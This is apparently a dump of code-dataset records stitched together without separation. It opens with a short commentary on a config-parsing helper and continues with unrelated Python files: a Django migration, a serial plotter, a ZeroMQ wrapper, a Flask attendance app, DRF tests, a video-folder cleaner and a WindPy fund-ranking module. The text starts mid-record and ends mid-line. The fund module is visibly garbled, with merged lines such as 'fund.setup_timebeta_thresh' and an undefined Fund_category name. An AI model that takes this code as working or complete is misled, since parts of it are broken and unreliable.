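fetch_record above scans the config line by line, switching collection on at the matching "backend NAME" header and off again at the next "backend" line. One caveat in add_record as written: the guard "if result not in result:" is always true (a list is never an element of itself), so duplicate records are never filtered; the intended check is presumably "if record not in result:". The scanning idea itself, restated over a string so the logic can be unit-tested without touching disk:

def records_for_backend(conf_text, backend):
    """Collect the indented record lines under one backend section."""
    records, in_section = [], False
    for line in conf_text.splitlines():
        stripped = line.strip()
        if stripped == "backend " + backend:
            in_section = True
            continue
        if in_section and stripped.startswith("backend"):
            break  # reached the next section
        if in_section and stripped:
            records.append(stripped)
    return records

conf = """backend www.oldboy.org
        server 100.1.7.9 weight 20 maxconn 3000
backend www.other.org
        server 100.1.7.10 weight 10 maxconn 100
"""
print(records_for_backend(conf, "www.oldboy.org"))
# ['server 100.1.7.9 weight 20 maxconn 3000']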
b'Sold'), (2, b'Not for Sale')])),\n ('image', sorl.thumbnail.fields.ImageField(upload_to=b'squigcard/cards/')),\n ('price', models.IntegerField(help_text=b'No currency required.', null=True, blank=True)),\n ('description', models.CharField(max_length=250, null=True, blank=True)),\n ('featured', models.BooleanField(default=False, help_text=b'Tick this to keep this item at the top.')),\n ('uploaded', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n 'ordering': ('-featured', '-uploaded'),\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Link',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=30)),\n ('url', models.URLField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TinyPage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200)),\n ('slug', models.SlugField()),\n ('intro_paragraph', models.TextField(help_text=b'This uses Markdown, which is documented here.')),\n ('contents', models.TextField(help_text=b'This uses Markdown, which is documented here.', null=True, blank=True)),\n ('image', sorl.thumbnail.fields.ImageField(null=True, upload_to=b'squigcard/pages/', blank=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"squigcards/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"330855496","text":"from threading import Thread\nimport time\nimport serial\nimport matplotlib.pyplot as plt\n\nclass Runner(Thread):\n def __init__(self):\n super().__init__()\n self.t0 = time.time()\n self.data = {\n 'delta_t': [],\n 'delta_t_control': [],\n }\n\n self.pending_cmd = None\n self.path_base = 'output_%d' % (int(time.time()) % 1000)\n\n def save(self):\n with open(self.path_base + '_delta_t.csv', 'w') as outp:\n for t, v in self.data['delta_t']:\n outp.write(\"%f,%f\\n\" % (t, v))\n with open(self.path_base + '_delta_t_control.csv', 'w') as outp:\n for t, dt, c in self.data['delta_t_control']:\n outp.write(\"%f,%f,%f\\n\" % (t, c, dt))\n\n def run(self):\n with serial.Serial('/dev/ttyUSB0', 74880) as ser:\n pending_dt = None\n while True:\n line = ser.readline()\n if line == b'k\\n':\n print(\"OK\")\n continue\n\n while len(line) < 4:\n line += ser.readline()\n\n if len(line) == 4:\n if line[0] == ord('d'):\n self.data['delta_t'] += [\n (time.time() - self.t0, int(line[1]) * 256 + int(line[2]))\n ]\n elif line[0] == ord('a'):\n pending_dt = int(line[1]) * 256 + int(line[2])\n elif line[0] == ord('f'):\n if pending_dt is not None:\n self.data['delta_t_control'] += [\n (time.time() - self.t0, pending_dt, int(line[1]) * 256 + int(line[2]))\n ]\n pending_dt = None\n else:\n print(\"Warning! Did not receive delta_t\")\n else:\n print(\"Warning! Unexpected: %s\" % line)\n\n self.save()\n if self.pending_cmd is not None:\n ser.write((self.pending_cmd + \"\\n\").encode(\"ascii\"))\n self.pending_cmd = None\n\n\nrunner = Runner()\nrunner.start()\n\ntime.sleep(2)\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.ion()\nplt.show()\n\nsetpoint = 2330.\nsetpoint *= 33.3 / 45.\n\nwhile True:\n ax.clear()\n ax.plot(\n [d[0] for d in runner.data['delta_t']],\n [100*(2330-d[1])/2330. 
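The migration above was auto-generated from a models.py. The following sketch, reconstructed only from the migration's own field list, shows a model definition that would produce such a CreateModel (the Link and TinyPage models are omitted for brevity). One nit: the original default=False on the integer state field only works because False == 0 in Python; default=0 says what is meant.

from django.db import models
from sorl.thumbnail import ImageField

class Card(models.Model):
    STATE_CHOICES = ((0, 'For Sale'), (1, 'Sold'), (2, 'Not for Sale'))

    name = models.CharField(max_length=200)
    # default=0 rather than the migration's default=False (False == 0 anyway).
    state = models.IntegerField(default=0, choices=STATE_CHOICES)
    image = ImageField(upload_to='squigcard/cards/')
    price = models.IntegerField(help_text='No currency required.',
                                null=True, blank=True)
    featured = models.BooleanField(default=False)
    uploaded = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ('-featured', '-uploaded')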
for d in runner.data['delta_t']], 'r+', alpha=.1)\n ax.plot(\n [d[0] for d in runner.data['delta_t_control']],\n [100*(2330-d[1])/2330. for d in runner.data['delta_t_control']], 'r-')\n ax.plot(\n [d[0] for d in runner.data['delta_t_control']],\n [d[2]/1000. - 5. for d in runner.data['delta_t_control']], 'b-')\n\n plt.ylim((-5, 5))\n plt.draw()\n cmd = input(\"Update? \")\n if len(cmd.strip()) > 0:\n runner.pending_cmd = cmd.strip()\n","sub_path":"esp8266-beogram/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"418794770","text":"# -*- coding: utf-8 -*-\n\"\"\"\n zmqconnector.py\n\n ZeroMQ Connector - Abstraction around a simple socket using\n ZMQ's PAIR socket type. (i.e. a Pipe)\n\n :copyright: (c) 2017 by Eric Gustafson\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nVERSION = (0, 2)\n__version__ = '.'.join(map(str, VERSION[0:2]))\n__description__ = 'ZeroMQ Connector in Python'\n__author__ = 'Eric Gustafson'\n__license__ = 'BSD'\n\nimport zmq\nimport logging\nimport sys\n\nlogger = logging.getLogger(__name__)\n\n## ############################################################\n\nclass ZmqConnection(object):\n \"\"\"ZeroMQ generalized connection\"\"\"\n\n def __init__(self, host, port):\n self.addr = \"tcp://{}:{}\".format(host, int(port))\n self.zcontext = zmq.Context()\n self.closed = False\n\n def send(self, data):\n return self.sock.send(data)\n\n def recv(self):\n return self.sock.recv()\n\n def close(self, linger=None):\n self.sock.close(linger)\n self.closed = True\n\n\nclass ZmqServer(ZmqConnection):\n\n def __init__(self, host, port):\n super(ZmqServer, self).__init__(host, port)\n self.sock = self.zcontext.socket(zmq.PAIR)\n self.sock.bind(self.addr)\n logger.debug(\"zmq listening on {}\".format(self.addr))\n\n\nclass ZmqClient(ZmqConnection):\n\n def __init__(self, host, port):\n super(ZmqClient, self).__init__(host, port)\n self.sock = self.zcontext.socket(zmq.PAIR)\n self.sock.connect(self.addr)\n logger.debug(\"zmq connecting to ()\".format(self.addr))\n\n\nif __name__=='__main__':\n logging.basicConfig(level='DEBUG', format='%(asctime)s - %(levelname)s - pid:%(process)d - %(message)s')\n logger.info(\"Using pyzmq v{}\".format(zmq.__version__))\n logger.info(\"Using libzmq v{}\".format(zmq.zmq_version()))\n","sub_path":"zmqconnector.py","file_name":"zmqconnector.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"73166198","text":"from flask import Flask, send_from_directory, redirect, render_template, request, jsonify\nfrom werkzeug.utils import secure_filename\nfrom functions import *\nimport math\nimport json\nimport os\nimport sys\nimport numpy as np\nimport time\nimport pickle\nimport uuid\nfrom multiprocessing import Process, Lock\n# from threading import Thread, Lock\nimport shutil\nfrom test_model import *\nUPLOAD_FOLDER = './uploads'\n\napp = Flask(__name__)\napp.config['TEMPLATES_AUTO_RELOAD'] = True\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nimg_stack = []\n\nif not os.path.isdir(data_dir):\n os.mkdir(data_dir)\n\nclass RequestFailError(Exception):\n pass\n\ndef allowed_file(filename):\n return '.' 
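The Runner above reassembles 16-bit words from two payload bytes with int(line[1]) * 256 + int(line[2]). Since indexing a bytes object already yields ints, the int() calls are redundant, and int.from_bytes expresses the same big-endian decode directly:

payload = bytes([0x09, 0x1a])             # stands in for line[1], line[2]
manual = payload[0] * 256 + payload[1]    # the arithmetic used above
builtin = int.from_bytes(payload, "big")  # same value, endianness made explicit
assert manual == builtin == 2330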
in filename and \\\n filename.rsplit('.', 1)[1].lower() in ['jpg', 'jpeg']\n\n@app.route('/static/js/')\ndef serve_static_js(path):\n return send_from_directory('static/js', path)\n\n@app.route('/static/css/')\ndef serve_static_css(path):\n return send_from_directory('static/css', path)\n\n@app.route('/static/img/')\ndef serve_static_img(path):\n return send_from_directory('static/img', path)\n\n@app.route('/static/fonts/')\ndef serve_static_fonts(path):\n return send_from_directory('static/fonts', path)\n\n@app.route('/')\ndef redirect_to_users():\n return redirect('/users')\n\n@app.route('/users')\ndef users():\n return render_template('users.j2')\n\n@app.route('/users/')\ndef user(user_id):\n return render_template('user.j2', user_id=user_id)\n\n@app.route('/users/new')\ndef new_user():\n return render_template('newuser.j2')\n\n@app.route('/attendances')\ndef attendances():\n return render_template('attendances.j2')\n\n@app.route('/dashboard')\ndef show_dashboard():\n return render_template('dashboard_live.j2')\n\n@app.route('/api/users', methods=['GET', 'POST'])\ndef api_users():\n try:\n if request.method == 'GET':\n return jsonify({\n 'success': True,\n 'data': [o.__dict__ for o in get_users()]\n })\n elif request.method == 'POST':\n body = request.json\n return jsonify({\n 'success': True,\n 'user_id': create_user(body['name'], body['email'])\n })\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n@app.route('/api/users/', methods=['GET', 'PUT'])\ndef api_user(user_id):\n try:\n if request.method == 'GET':\n return jsonify({\n 'success': True,\n 'data': get_user(user_id).__dict__\n })\n else:\n update_user(user_id, request.json)\n return jsonify({\n 'success': True\n })\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n@app.route('/api/users//train', methods=['POST'])\ndef api_train(user_id):\n try:\n user = get_user(user_id)\n file_keys = ['file' + str(x) for x in range(1, 6)]\n if 'file' not in request.files:\n raise RequestFailError('file not provided')\n file = request.files['file']\n if file:\n secured_filename = secure_filename(str(time.time()) + '.jpg')\n if not os.path.isdir('raw_dataset/' + str(user.user_id)):\n os.mkdir('raw_dataset/' + str(user.user_id))\n filepath = 'raw_dataset/{}/{}'.format(user.user_id, secured_filename)\n file.save(filepath)\n \n return jsonify({\n 'success': True\n })\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n \n\n\n@app.route('/api/attendances')\ndef api_attendances():\n try:\n return jsonify({\n 'success': True,\n 'data': [o.__dict__ for o in get_attendances()]\n })\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n@app.route('/api/attendance/')\ndef api_attendance(id):\n try:\n return jsonify({\n 'success': True,\n 'data': get_attendance(id).__dict__\n })\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n@app.route('/api/classify', methods=['POST'])\ndef api_classify():\n try:\n if 'file' not in request.files:\n raise RequestFailError('File not provided')\n file = request.files['file']\n if file.filename == '':\n raise RequestFailError('No file selected')\n if file:\n filename = secure_filename(str(time.time()) + '.jpg')\n filepath = 
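Two small notes on the connector above: ZMQ PAIR sockets form an exclusive pipe between exactly one bind endpoint and one connect endpoint, and the client's log line "zmq connecting to ()" has lost its {} placeholder, so format() never interpolates the address. A minimal in-process round trip over PAIR, assuming pyzmq is installed and an arbitrary free localhost port:

import zmq

ctx = zmq.Context()
server = ctx.socket(zmq.PAIR)
server.bind("tcp://127.0.0.1:5555")   # arbitrary test port
client = ctx.socket(zmq.PAIR)
client.connect("tcp://127.0.0.1:5555")

client.send(b"ping")
print(server.recv())   # b'ping'
server.send(b"pong")
print(client.recv())   # b'pong'

client.close()
server.close()
ctx.term()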
os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(filepath)\n img_stack.append(filepath)\n return jsonify({\n 'success': True\n })\n else:\n raise RequestFailError('Invalid file uploaded - ' + file.filename)\n except Exception as e:\n print(e)\n return jsonify({\n 'success': False,\n 'reason': str(e)\n })\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n # socketio.run(app)\n","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"112958627","text":"\n\nfrom xai.brain.wordbase.verbs._proscribe import _PROSCRIBE\n\n#calss header\nclass _PROSCRIBING(_PROSCRIBE, ):\n\tdef __init__(self,): \n\t\t_PROSCRIBE.__init__(self)\n\t\tself.name = \"PROSCRIBING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"proscribe\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_proscribing.py","file_name":"_proscribing.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"438339375","text":"# Implement a class to hold room information. This should have name and\n# description attributes.\nclass Room:\n def __init__(self, name, description, items=['nothing, haha loser']):\n self.name = name\n self.description = description\n self.items = items\n self.n = None\n self.e = None\n self.s = None\n self.w = None\n\n def __str__(self):\n if self.items == None:\n print(\"There are no items here\")\n else:\n return \"You are now in {self.name}. {self.description}. You look around for items and find... {self.items}\".format(self=self)\n\n def print_items(self):\n for id, p in enumerate(self.items):\n print(f\"{id}: {p}\")\n print()\n","sub_path":"src/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"592305899","text":"x = {\"health\": 100, \"ma\": 20} # dictionary\n\naudioSetting = dict(channel=2, bitrate=16, frequency=48000)\n\n# zip은 iterator를 index 마다 묶어주는 역할을 한다.\nprint(zip(['a', 'b'], [1, 2])) # return zip object\n\ny = dict(zip(['a', 'b'], [1, 2]))\nz = dict([('a', 1), ('b', 2)])\n\nprint(audioSetting['channel'])\nprint(audioSetting['bitrate'])\nprint(audioSetting['frequency'])\n\nprint(\"channel\" in audioSetting) # true\nprint(len(audioSetting)) # dic len\n\n# 12.4\n# 연습문제:\n\ncamille = {\n 'health': 575.6,\n 'health_regen': 1.7,\n 'mana': 338.8,\n 'mana_regen': 1.63,\n 'melee': 125,\n 'attack_damage': 60,\n 'attack_speed': 0.625,\n 'armor': 26,\n 'magic_resistance': 32.1,\n 'movement_speed': 340\n}\n\nprint(camille['health'])\nprint(camille['movement_speed'])\n\n# 입력\n# health health_regen mana mana_regen\n# 575.6 1.7 338.8 1.63\n# 결과\n# {'health': 575.6, 'health_regen': 1.7, 'mana': 338.8, 'mana_regen': 1.63}\n# 입력\n# health mana melee attack_speed magic_resistance\n# 573.6 308.8 600 0.625 35.7\n# 결과\n# {'health': 573.6, 'mana': 308.8, 'melee': 600.0, 'attack_speed': 0.625, 'magic_resistance': 35.7}\n\nprint('insert keys and values')\n\nkeys = input().split(' ') # ret list iter\nvalues = input().split(' ') # ret list iter\n\nprint(keys)\nprint(values)\n\nchar_dict = {}\n# or\nchar_dict = dict()\n\nchar_dict = dict(zip(keys, values)) # {'aa': '11', 'kk': '22', 'bb': '33'}\ntest_list = list(zip(keys, values)) # [('aa', '11'), ('kk', '22'), ('bb', '33')]\ntest_tuple = tuple(zip(keys, values))\n# zip은 iterator를 
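The /api/classify handler above follows the standard Flask upload pattern: check that 'file' is in request.files, reject empty filenames, then save under a sanitized, timestamped name. The same pattern condensed into a self-contained sketch (the route and folder names here are illustrative, not the app's own):

import os
import time

from flask import Flask, jsonify, request
from werkzeug.utils import secure_filename

app = Flask(__name__)
app.config["UPLOAD_FOLDER"] = "./uploads"   # illustrative path

@app.route("/upload", methods=["POST"])     # illustrative route
def upload():
    if "file" not in request.files:
        return jsonify(success=False, reason="file not provided"), 400
    file = request.files["file"]
    if file.filename == "":
        return jsonify(success=False, reason="no file selected"), 400
    # Never trust the client's filename; sanitize and timestamp it.
    name = secure_filename(str(time.time()) + ".jpg")
    os.makedirs(app.config["UPLOAD_FOLDER"], exist_ok=True)
    file.save(os.path.join(app.config["UPLOAD_FOLDER"], name))
    return jsonify(success=True)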
index 마다 묶어주는 역할을 한다.\n# ex) zip([1,2],[3,4]) -> [(1,3),(2,4)]\nprint(char_dict)\nprint(test_list)\nprint(test_tuple)\n","sub_path":"Using_Pycharm_codo/Codo12_usingDictionary/using_Dictionary.py","file_name":"using_Dictionary.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22313655","text":"from rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom ecojunk.junk.models import Deal, JunkPoint\nfrom ecojunk.junk.tests.factories import (\n DealFactory,\n JunkPointFactory,\n JunkPointTypeFactory,\n JunkPointRealisticFactory,\n)\nfrom ecojunk.junk.api.v1.serializers import JunkPointSerializer\nfrom ecojunk.users.constants import RIDER, USER\nfrom ecojunk.users.tests.factories import RolFactory, UserFactory\nfrom django.contrib.gis.geos import Point\n\n\nclass JunkPointTypeResourceTest(APITestCase):\n junk_point_type_factory = JunkPointTypeFactory\n\n def setUp(self):\n self.user = UserFactory()\n\n def test_list_junk_point_types(self):\n junk_point_types = JunkPointTypeFactory.create_batch(size=10)\n\n self.client.force_authenticate(self.user)\n response = self.client.get(\"/api/v1/junk_point_types/\", format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n data = response.json()\n self.assertEqual(len(junk_point_types), data[\"count\"])\n\n\nclass JunkPointResourceTest(APITestCase):\n junk_point_factory = JunkPointFactory\n\n def setUp(self):\n self.user = UserFactory()\n\n def test_list_junk_points(self):\n junk_points = JunkPointFactory.create_batch(size=10)\n\n self.client.force_authenticate(self.user)\n response = self.client.get(\"/api/v1/junk_points/\", format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n data = response.json()\n self.assertEqual(len(junk_points), data[\"count\"])\n\n def test_list_junk_points_with_coords(self):\n junk_point = JunkPointRealisticFactory()\n location = Point(39.478_328_1, -0.376_823_7)\n self.client.force_authenticate(self.user)\n response = self.client.get(\n f\"/api/v1/junk_points/?lat={location[1]}&lng={location[0]}\", format=\"json\"\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n data = response.json()\n serializer = JunkPointSerializer(junk_point)\n self.assertTrue(serializer.data in data[\"results\"])\n\n def test_create_junk_point(self):\n point_types = JunkPointTypeFactory.create_batch(size=3)\n data = {\n \"street_name\": \"Junk point street name\",\n \"description\": \"Junk point description\",\n \"location\": \"POINT (2.2945 48.8583)\",\n \"types\": [point_types[0].pk, point_types[1].pk, point_types[2].pk],\n }\n\n self.client.force_authenticate(self.user)\n response = self.client.post(\"/api/v1/junk_points/\", data=data, format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(JunkPoint.objects.count(), 1)\n\n\nclass DealTest(APITestCase):\n deal_factory = JunkPointFactory\n\n def setUp(self):\n self.user_rider = UserFactory()\n self.user_customer = UserFactory()\n\n self.rol_rider = RolFactory(rol=RIDER)\n self.rol_customer = RolFactory(rol=USER)\n\n self.user_rider.permissions.add(self.rol_rider)\n self.user_rider.save()\n\n self.user_customer.permissions.add(self.rol_customer)\n self.user_customer.save()\n\n def test_list_deal(self):\n deals = DealFactory.create_batch(size=10)\n\n self.client.force_authenticate(self.user_customer)\n response = self.client.get(\"/api/v1/deals/\", 
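One detail the exercise above glosses over: input().split() yields strings, so dict(zip(keys, values)) stores '575.6' rather than the 575.6 shown in the expected output. Mapping float over the values closes that gap:

keys = "health health_regen mana mana_regen".split()
raw_values = "575.6 1.7 338.8 1.63".split()

# zip pairs the two lists index by index; float() fixes the value types.
stats = dict(zip(keys, map(float, raw_values)))
print(stats)
# {'health': 575.6, 'health_regen': 1.7, 'mana': 338.8, 'mana_regen': 1.63}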
format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n data = response.json()\n self.assertEqual(len(deals), data[\"count\"])\n\n def test_create_deal(self):\n junk_point = JunkPointFactory()\n data = {\"junk_point\": junk_point.pk, \"price\": 2.0}\n\n self.client.force_authenticate(self.user_customer)\n response = self.client.post(\"/api/v1/deals/\", data=data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Deal.objects.count(), 1)\n\n def test_accept_deal(self):\n deal = DealFactory()\n deal.rider = None\n deal.save()\n\n self.client.force_authenticate(self.user_rider)\n response = self.client.post(f\"/api/v1/deals/{deal.pk}/accept_deal/\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(Deal.objects.get(pk=deal.pk).rider == self.user_rider)\n\n def test_decline_deal(self):\n deal = DealFactory()\n\n deal.rider = self.user_rider\n deal.save()\n\n self.client.force_authenticate(self.user_rider)\n response = self.client.post(f\"/api/v1/deals/{deal.pk}/decline_deal/\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n","sub_path":"ecojunk/junk/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":4669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"546592438","text":"from test.test_const import CONST_BASE_URL, CONST_PORT, CONST_SSL\nfrom unittest import TestCase\nfrom datetime import date, datetime\n\nfrom pygrocydm import GrocyAPI\nfrom pygrocydm.system import System\nfrom pygrocydm.grocy_api_client import GrocyApiClient\n\n\nclass TestSystem(TestCase):\n\n def setUp(self):\n self.grocy_api = GrocyAPI(CONST_BASE_URL, \"demo_mode\", verify_ssl = CONST_SSL, port = CONST_PORT)\n self.api_client = GrocyApiClient(CONST_BASE_URL, \"demo_mode\", verify_ssl=CONST_SSL, port=CONST_PORT)\n\n\n def test_versions(self):\n system = self.grocy_api.system()\n self.assertIsInstance(system, System)\n self.assertIsInstance(system.grocy_version, str)\n self.assertIsInstance(system.grocy_release_date(), date)\n self.assertIsInstance(system.php_version, str)\n self.assertIsInstance(system.sqlite_version, str)\n\n def test_db_changed_time(self):\n db_time = self.grocy_api.system().db_changed_time()\n self.assertIsInstance(db_time, datetime)\n","sub_path":"test/test_system.py","file_name":"test_system.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313268374","text":"import os, os.path\nimport string\nimport stat\nimport shutil \n\n# Known vid extensions\nvidExtenstions = ['.avi','.mkv','.mp4']\n\nMIN_VID_SIZE_BYTE = 2000000\n\ndef IsVidFile(file):\n\text = os.path.splitext(file)[1]\n\treturn ext in vidExtenstions\n\ndef GetWordDelimiter(baseName):\n\tfirstDot = baseName.find('.')\n\tif firstDot < 0:\n\t\tfirstDot = len(baseName)\n\n\tfirstSpace = baseName.find(' ')\n\tif firstSpace < 0:\n\t\tfirstSpace = len(baseName)\n\n\tif firstDot < firstSpace:\n\t\treturn '.'\n\telif firstSpace < firstDot:\n\t\treturn ' '\n\telse:\n\t\treturn ''\n\ndef CaptalizeFirstLetters(dir, file):\n\text = os.path.splitext(file)[1]\n\tbase = os.path.splitext(file)[0]\n\n\tdelim = GetWordDelimiter(base)\n\tnewBase = string.capwords(base, delim)\n\n\tsrc = os.path.abspath(os.path.join(dir, file))\n\ttrgt = os.path.abspath(os.path.join(dir, newBase + ext))\n\n\tos.rename(src, trgt)\n\n\treturn newBase + ext\n\ndef 
RemoveNonVideoFilesFromDir(path):\n\tremove = False\n\tif not os.path.isdir(path):\n\t\tif not IsVidFile(path):\n\t\t\tremove = True\n\t\tif os.path.getsize(path) < MIN_VID_SIZE_BYTE:\n\t\t\tremove = True\n\telse:\n\t\tfiles = os.listdir(path)\n\t\tfor file in files:\n\t\t\tfilePath = os.path.join(path, file)\n\t\t\t# Attempt removing non video files from path\n\t\t\tRemoveNonVideoFilesFromDir(filePath)\n\t\t# If the directory is empty we remove it\n\t\tif len(os.listdir(path)) == 0:\n\t\t\tremove = True\n\n\tif remove:\n\t\t# If the file is read only we remove the read only flag as we are about to delete it\n\t\tif not os.access(path, os.W_OK):\n\t\t\tos.chmod(path, stat.S_IWUSR)\n\t\t# Remove it\n\t\tif os.path.isdir(path):\n\t\t\tshutil.rmtree(path)\n\t\telse:\n\t\t\tos.remove(path)\n","sub_path":"Utils/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"278785772","text":"from WindPy import *\nfrom datetime import datetime,timedelta\nfrom pandas import Series,DataFrame\nfrom Fund import Fund,Private_Category,Public_Category\nimport numpy as np\nimport pandas as pd\nimport time\n# from wind_codes import codes_list\nfrom collections import defaultdict\n\n\nclass Funds_group:\n def __init__(self,Funds_list):\n self.funds_list=Funds_list\n def funds_rank(self,judge_on='comprehensive'):\n Funds_list=self.funds_list\n funds_index=[]\n d=defaultdict(list)\n if judge_on=='comprehensive':\n bins=[-0.1,0.15,0.35,0.65,0.85,1.1]\n group_name=['优秀','良好','一般','中下','差']\n rank_weight=np.array([0.4,0.3,0.3])\n for i in range(len(Funds_list)):\n funds_index.append(Funds_list[i].code)\n d['returns'].append(Funds_list[i].accurate_return)\n d['sharp'].append(Funds_list[i].annual_sharp)\n d['max_lost'].append(Funds_list[i].max_lost)\n elif judge_on=='risk':\n bins=[-0.1,0.05,0.2,0.5,0.8,1.1]\n group_name=['低风险','中低风险','一般风险','较高风险','高风险']\n rank_weight=np.array([0.5,0.5])\n\n for i in range(len(Funds_list)):\n funds_index.append(Funds_list[i].code)\n d['volatility_rate'].append(-Funds_list[i].volatility_rate)\n d['max_lost_rate'].append(-Funds_list[i].max_lost_rate)\n else:\n raise TypeError('argument \"judge_on\" must be \"comprehensive\" or \"risk\"')\n\n Data=DataFrame(d,index=funds_index)\n Rank=Data.rank()/len(Data) #pandas默认的rank方法按照ascending排序的,即得分越小,排名越小,得分越大,排名越大\n final_score=(Rank*rank_weight).sum(axis=1).rank()/len(Data)*100\n final_rank=final_score.rank(ascending=False)\n final_rank_pct=final_rank/len(Funds_list)\n\n final_evaluation=pd.cut(final_rank_pct,bins,labels=group_name)\n keys=['score','rank_pct','evaluation']\n result=pd.concat([final_score,final_rank,final_evaluation],axis=1,keys=keys)\n return result\n\n def funds_filter(self,qualified_number=8,latest_setup_date=datetime(1980,1,1),category=''):\n '设置筛选条件'\n if not category: # 如果category为空 那么赋予其 全类型列表\n category=Fund_category.new_categories\n else:\n category=[category]\n Funds_list=self.funds_list\n new_Funds_list=[]\n for i in range(len(Funds_list)):\n fund=Funds_list[i]\n if fund.count>qualified_number and fund.setup_timebeta_thresh:\n market_corr=fund.market_corr_rate\n flag=market_corr[0]\n style='偏小盘' if flag<1/3 else ('混合型' if flag<2/3 else '偏大盘')\n else:\n market_corr=[np.nan,np.nan]\n style=np.nan\n\n Funds_market_corr.append(market_corr)\n styles.append(style)\n Codes.append(code)\n data=np.array(np.column_stack([Funds_market_corr,styles]))\n return 
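RemoveNonVideoFilesFromDir above clears the read-only bit before deleting, because os.remove and shutil.rmtree fail on read-only entries, notably on Windows. The same idea packaged as a reusable helper, using rmtree's error hook so nested read-only files inside a tree are handled as well:

import os
import stat
import shutil

def force_remove(path):
    """Delete a file or directory tree, clearing read-only bits as needed."""
    def make_writable_and_retry(func, p, exc_info):
        # rmtree error hook: make the offending entry writable, then retry.
        os.chmod(p, stat.S_IWUSR)
        func(p)

    if os.path.isdir(path):
        shutil.rmtree(path, onerror=make_writable_and_retry)
    else:
        if not os.access(path, os.W_OK):
            os.chmod(path, stat.S_IWUSR)
        os.remove(path)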
DataFrame(data,index=Codes,columns=['大盘比率','小盘比率','持股份股'])\n\n\n\ndef funds_data_load(codes_list,evaluation_range_date):\n '公募基金数据载入'\n w.start()\n # w.wsd(\"600000.SH\",\"close\",\"2013-04-30\", datetime.today()-timedelta(0))\n evaluation_begin_date=evaluation_range_date[0]\n evaluation_end_date=evaluation_range_date[1]\n\n Num_funds = len(codes_list)\n pile = 1000\n N_times = Num_funds // pile\n N_mod = Num_funds % pile\n if N_mod==0:\n N_mod=pile\n N_times-=1\n Funds_profile = w.wss(codes_list[0:N_mod],\n 'Fund_fullname,fund_fundmanager,fund_mgrcomp,fund_setupdate,fund_investtype')\n N_Data = len(Funds_profile.Data)\n\n for i in range(N_times):\n temp_profile = w.wss(codes_list[N_mod + i * pile: N_mod + (i + 1) * pile],\n 'Fund_fullname,fund_fundmanager,fund_mgrcomp,fund_setupdate,fund_investtype')\n Funds_profile.Codes.extend(temp_profile.Codes)\n for j in range(N_Data):\n Funds_profile.Data[j].extend(temp_profile.Data[j])\n\n Funds_list=[]\n names=Fund._field\n for i in range(Num_funds):\n temp_Data=w.wsd(codes_list[i],'nav_adj',evaluation_begin_date,evaluation_end_date)\n temp_TS=Series(temp_Data.Data[0],index=temp_Data.Times).dropna()\n values=[Funds_profile.Data[0][i], Funds_profile.Codes[i],Funds_profile.Data[2][i], 